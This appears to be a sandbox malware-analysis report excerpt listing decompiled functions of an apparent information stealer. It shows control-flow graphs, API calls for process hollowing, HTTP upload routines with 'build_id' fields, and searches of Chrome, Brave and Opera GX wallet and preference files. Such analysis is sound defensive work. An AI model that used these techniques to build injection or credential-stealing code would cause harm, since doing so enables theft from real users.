615->616 617 41bb64-41bb6b 616->617 618 41bb08-41bb5f GetProcAddress * 4 616->618 619 41bb83-41bb84 617->619 620 41bb6d-41bb7e GetProcAddress 617->620 618->617 620->619
                                                    APIs
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B06C
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B083
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B09A
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B0B1
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B0C8
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B0DF
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B0F6
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B10D
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B124
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B13B
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B152
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B169
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B180
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B197
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B1AE
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B1C5
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B1DC
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B1F3
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B20A
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B221
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B238
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B24F
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B266
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B27D
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B294
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B2AB
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B2C2
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B2D9
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B2F0
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B307
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B31E
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B335
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B34C
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B363
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B37A
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B391
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B3A8
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B3BF
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B3D6
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B3ED
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B404
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B41B
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B432
                                                    • GetProcAddress.KERNEL32(CreateProcessA), ref: 0041B448
                                                    • GetProcAddress.KERNEL32(GetThreadContext), ref: 0041B45E
                                                    • GetProcAddress.KERNEL32(ReadProcessMemory), ref: 0041B474
                                                    • GetProcAddress.KERNEL32(VirtualAllocEx), ref: 0041B48A
                                                    • GetProcAddress.KERNEL32(ResumeThread), ref: 0041B4A0
                                                    • GetProcAddress.KERNEL32(WriteProcessMemory), ref: 0041B4B6
                                                    • GetProcAddress.KERNEL32(SetThreadContext), ref: 0041B4CC
                                                    • LoadLibraryA.KERNEL32(?,0041922C), ref: 0041B4DD
                                                    • LoadLibraryA.KERNEL32(?,0041922C), ref: 0041B4EE
                                                    • LoadLibraryA.KERNEL32(?,0041922C), ref: 0041B4FF
                                                    • LoadLibraryA.KERNEL32(?,0041922C), ref: 0041B510
                                                    • LoadLibraryA.KERNEL32(?,0041922C), ref: 0041B521
                                                    • LoadLibraryA.KERNEL32(?,0041922C), ref: 0041B532
                                                    • LoadLibraryA.KERNEL32(?,0041922C), ref: 0041B543
                                                    • LoadLibraryA.KERNEL32(?,0041922C), ref: 0041B554
                                                    • LoadLibraryA.KERNEL32(dbghelp.dll,?,0041922C), ref: 0041B564
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B584
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B59B
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B5B2
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B5C9
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B5E0
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B604
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B61B
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B632
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B649
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B660
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B677
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B68E
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B6A5
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B6C5
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B6DC
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B6F3
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B70A
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B721
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B745
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B75C
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B773
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B78A
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B7A1
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B7B8
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B7DC
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B7F3
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B80A
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B821
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B838
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B84F
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B866
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B87D
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B894
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B8B4
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B8CB
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B8E2
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B8F9
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B910
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B930
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B947
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B967
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B97E
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B9A2
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B9B9
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B9D0
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B9E7
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041B9FE
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041BA15
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041BA2C
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041BA43
                                                    • GetProcAddress.KERNEL32(HttpQueryInfoA), ref: 0041BA59
                                                    • GetProcAddress.KERNEL32(InternetSetOptionA), ref: 0041BA6F
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041BA8F
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041BAA6
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041BABD
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041BAD4
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041BAF4
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041BB14
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041BB2B
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041BB42
                                                    • GetProcAddress.KERNEL32(?,0041922C), ref: 0041BB59
                                                    • GetProcAddress.KERNEL32(SymMatchString), ref: 0041BB78
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressProc$LibraryLoad
                                                    • String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
                                                    • API String ID: 2238633743-2740034357
                                                    • Opcode ID: a4580aef7196ab40cac15de4e3c6625ffa806c5fa5d16c7cc0568451c0f19aac
                                                    • Instruction ID: 64df46d759b3a8e539eb425d674754a75b55508f076e1d27ec912ac7423ac894
                                                    • Opcode Fuzzy Hash: a4580aef7196ab40cac15de4e3c6625ffa806c5fa5d16c7cc0568451c0f19aac
                                                    • Instruction Fuzzy Hash: 9552C57D481214EFEB025F61FE19AA43FB3F70B3417197129E91289671E77648A8EF80
                                                    Function 004058C4 Relevance: 42.6, APIs: 20, Strings: 4, Instructions: 565networkstringmemoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1535 4058c4-40597d call 4116b4 call 40430f call 411668 * 5 call 41193a InternetOpenA StrCmpCA 1552 405986-40598a 1535->1552 1553 40597f 1535->1553 1554 405990-405b02 call 412d64 call 4117e0 call 41177a call 411701 * 2 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 4117e0 call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 4117e0 call 41177a call 411701 * 2 InternetConnectA 1552->1554 1555 406073-40609a InternetCloseHandle call 41193a call 407dc2 1552->1555 1553->1552 1554->1555 1639 405b08-405b13 1554->1639 1565 4060d8-40613e call 412bcb * 2 call 4116b4 call 411701 * 5 call 40131a call 411701 1555->1565 1566 40609c-4060d3 call 411715 call 41185b call 41177a call 411701 1555->1566 1566->1565 1640 405b21 1639->1640 1641 405b15-405b1f 1639->1641 1642 405b2b-405b59 HttpOpenRequestA 1640->1642 1641->1642 1643 406067-40606d InternetCloseHandle 1642->1643 1644 405b5f-405b63 1642->1644 1643->1555 1645 405b65-405b84 InternetSetOptionA 1644->1645 1646 405b8a-405fe2 call 41185b call 41177a call 411701 call 4117e0 call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 4117e0 call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 4117e0 call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 402278 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 4117e0 call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 41185b call 41177a call 411701 call 4117e0 call 41177a call 411701 call 41193a lstrlenA call 41193a lstrlenA GetProcessHeap HeapAlloc call 41193a lstrlenA call 41193a memcpy call 41193a lstrlenA call 41193a * 2 lstrlenA memcpy call 41193a lstrlenA call 41193a HttpSendRequestA 1644->1646 1645->1646 1805 405fe8-406011 InternetReadFile 1646->1805 1806 406013-40601a 1805->1806 1807 40601c-406061 InternetCloseHandle 1805->1807 1806->1807 1808 40601e-40605c call 41185b call 41177a call 411701 1806->1808 1807->1643 1808->1805
                                                    APIs
                                                      • Part of subcall function 004116B4: lstrcpyA.KERNEL32(?,?,?,?,004118C6,00000000), ref: 004116F4
                                                      • Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT ref: 00404373
                                                      • Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT ref: 00404387
                                                      • Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT ref: 0040439B
                                                      • Part of subcall function 0040430F: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 004043B9
                                                      • Part of subcall function 0040430F: InternetCrackUrlA.WININET(00000000,00000000), ref: 004043C9
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040595F
                                                    • StrCmpCA.SHLWAPI(?), ref: 00405975
                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405AEF
                                                    • HttpOpenRequestA.WININET(00000000,?,00000000,00000000,00400100,00000000), ref: 00405B4C
                                                    • lstrlenA.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,mode,00000000,?,00000000,?,00428D7C,00000000), ref: 00405F2B
                                                    • lstrlenA.KERNEL32(00000000), ref: 00405F3C
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00405F4C
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00405F53
                                                    • lstrlenA.KERNEL32(00000000), ref: 00405F68
                                                    • memcpy.MSVCRT ref: 00405F7E
                                                    • lstrlenA.KERNEL32(00000000), ref: 00405F8F
                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405FA8
                                                    • memcpy.MSVCRT ref: 00405FB5
                                                    • lstrlenA.KERNEL32(00000000,?,?), ref: 00405FCF
                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405FE2
                                                    • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405FFE
                                                    • InternetCloseHandle.WININET(00000000), ref: 00406061
                                                    • InternetCloseHandle.WININET(00000000), ref: 0040606D
                                                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00405B84
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                      • Part of subcall function 004117E0: lstrcpyA.KERNEL32(00000000,00000000), ref: 0041182C
                                                      • Part of subcall function 004117E0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041183A
                                                    • InternetCloseHandle.WININET(00000000), ref: 00406076
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileOptionProcessReadSend
                                                    • String ID: "$------$build_id$mode
                                                    • API String ID: 487080699-3829489455
                                                    • Opcode ID: 99e7d839f9470243f8a500febddaa2585a4ce8104e375d9646ee5b01df51d87c
                                                    • Instruction ID: c3a436f612394fb5ea9af5c3dff246c6ebafd40c3fbf54516d0a2530dbd512cc
                                                    • Opcode Fuzzy Hash: 99e7d839f9470243f8a500febddaa2585a4ce8104e375d9646ee5b01df51d87c
                                                    • Instruction Fuzzy Hash: 0632EB71920118AADB15FBA1DC96FDEB379BF14305F5001AAF216B21B1DF386B88CE54
                                                    Function 00409FC0 Relevance: 41.0, APIs: 18, Strings: 5, Instructions: 760fileCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1816 409fc0-40a052 call 411668 call 4117e0 call 41185b call 41177a call 411701 * 2 call 411668 * 2 call 41193a FindFirstFileA 1835 40a094-40a0a8 StrCmpCA 1816->1835 1836 40a054-40a08f call 411701 * 3 call 40131a call 411701 * 3 1816->1836 1838 40a0c0 1835->1838 1839 40a0aa-40a0be StrCmpCA 1835->1839 1880 40ab7e-40ab7f 1836->1880 1841 40ab22-40ab34 FindNextFileA 1838->1841 1839->1838 1842 40a0c5-40a13e call 411715 call 4117e0 call 41185b * 2 call 41177a call 411701 * 3 1839->1842 1841->1835 1845 40ab3a-40ab79 FindClose call 411701 * 3 call 40131a call 411701 * 3 1841->1845 1886 40a144-40a15d call 41193a StrCmpCA 1842->1886 1887 40a275-40a2f4 call 41185b * 4 call 41177a call 411701 * 4 1842->1887 1845->1880 1892 40a163-40a1e7 call 41185b * 4 call 41177a call 411701 * 4 1886->1892 1893 40a1ec-40a26b call 41185b * 4 call 41177a call 411701 * 4 1886->1893 1939 40a2f9-40a312 call 41193a StrCmpCA 1887->1939 1949 40a270 1892->1949 1893->1949 1946 40a318-40a32c StrCmpCA 1939->1946 1947 40a50c-40a521 StrCmpCA 1939->1947 1946->1947 1950 40a332-40a484 call 411668 call 412d64 call 41185b call 4117e0 call 41185b call 4117e0 call 41177a call 411701 * 5 call 41193a * 2 call 411668 call 41185b * 2 call 41177a call 411701 * 2 call 4116b4 call 407cdf 1946->1950 1951 40a523-40a56a call 40134c call 4116b4 * 3 call 4083a6 1947->1951 1952 40a57a-40a58f StrCmpCA 1947->1952 1949->1939 2164 40a486-40a4c9 call 4116b4 call 40134c call 418db9 call 411701 1950->2164 2165 40a4ce-40a507 call 41193a call 4118d5 call 41193a call 411701 * 2 1950->2165 2012 40a56f-40a575 1951->2012 1953 40a591-40a5a8 call 41193a StrCmpCA 1952->1953 1954 40a60d-40a625 call 4116b4 call 412f4c 1952->1954 1966 40a608 1953->1966 1967 40a5aa-40a5ae 1953->1967 1979 40a627-40a62b 1954->1979 1980 40a68d-40a6a2 StrCmpCA 1954->1980 1970 40aaa6-40aaaf 1966->1970 1967->1966 1971 40a5b0-40a602 call 40134c call 4116b4 * 3 call 408741 1967->1971 1975 40aab1-40ab07 call 4116b4 * 2 call 411668 call 40134c call 409fc0 1970->1975 1976 40ab12-40ab1d call 4118d5 * 2 1970->1976 1971->1966 2048 40ab0c 1975->2048 1976->1841 1986 40a688 1979->1986 1987 40a62d-40a67d call 40134c call 4116b4 call 411668 call 4116b4 call 408741 1979->1987 1983 40a8d7-40a8ec StrCmpCA 1980->1983 1984 40a6a8-40a778 call 411668 call 412d64 call 41185b call 4117e0 call 41185b call 4117e0 call 41177a call 411701 * 5 call 41193a * 2 CopyFileA 1980->1984 1983->1970 1998 40a8f2-40a9c2 call 411668 call 412d64 call 41185b call 4117e0 call 41185b call 4117e0 call 41177a call 411701 * 5 call 41193a * 2 CopyFileA 1983->1998 2106 40a834-40a84d call 41193a StrCmpCA 1984->2106 2107 40a77e-40a82e call 40134c call 4116b4 * 3 call 408dda call 40134c call 4116b4 * 3 call 4096ce 1984->2107 1986->1970 2049 40a682 1987->2049 2113 40a9c8-40aa18 call 40134c call 4116b4 * 3 call 4090fb 1998->2113 2114 40aa7e-40aa96 call 41193a DeleteFileA call 4118d5 1998->2114 2012->1970 2048->1976 2049->1986 2122 40a8aa-40a8c2 call 41193a DeleteFileA call 4118d5 2106->2122 2123 40a84f-40a8a4 call 40134c call 4116b4 * 3 call 409c1a 2106->2123 2107->2106 2166 40aa1d-40aa78 call 40134c call 4116b4 * 3 call 4093a2 2113->2166 2132 40aa9b-40aaa1 call 411701 2114->2132 2145 40a8c7-40a8d2 call 411701 2122->2145 2123->2122 2132->1970 2145->1970 2164->2165 2165->1947 2166->2114
                                                    APIs
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                      • Part of subcall function 004117E0: lstrcpyA.KERNEL32(00000000,00000000), ref: 0041182C
                                                      • Part of subcall function 004117E0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041183A
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                    • FindFirstFileA.KERNEL32(00000000,?,00425200,00425200,00000000,?,?,?,00428F3C,00425200), ref: 0040A045
                                                    • StrCmpCA.SHLWAPI(?,00425240), ref: 0040A0A0
                                                    • StrCmpCA.SHLWAPI(?,0042523C), ref: 0040A0B6
                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0040AB2C
                                                    • FindClose.KERNEL32(000000FF), ref: 0040AB3D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                    • String ID: Brave$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
                                                    • API String ID: 3334442632-1189830961
                                                    • Opcode ID: b6171a64cfc6ab4f13282320838a7735dbd279b900ab7de6f694e87253319736
                                                    • Instruction ID: 263e58a2a74b46f478eabfba2e73a67f6604dac1ca14d90e5786d28d1d592fab
                                                    • Opcode Fuzzy Hash: b6171a64cfc6ab4f13282320838a7735dbd279b900ab7de6f694e87253319736
                                                    • Instruction Fuzzy Hash: 225241719002089BDF24FBB1DC56EED737DAF15304F40416AF61AA21A1EE399B88CF59
                                                    Function 1FA34CF0 Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 461fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,-00000003,04000102,00000000), ref: 1FA34EE1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
                                                    • API String ID: 823142352-3829269058
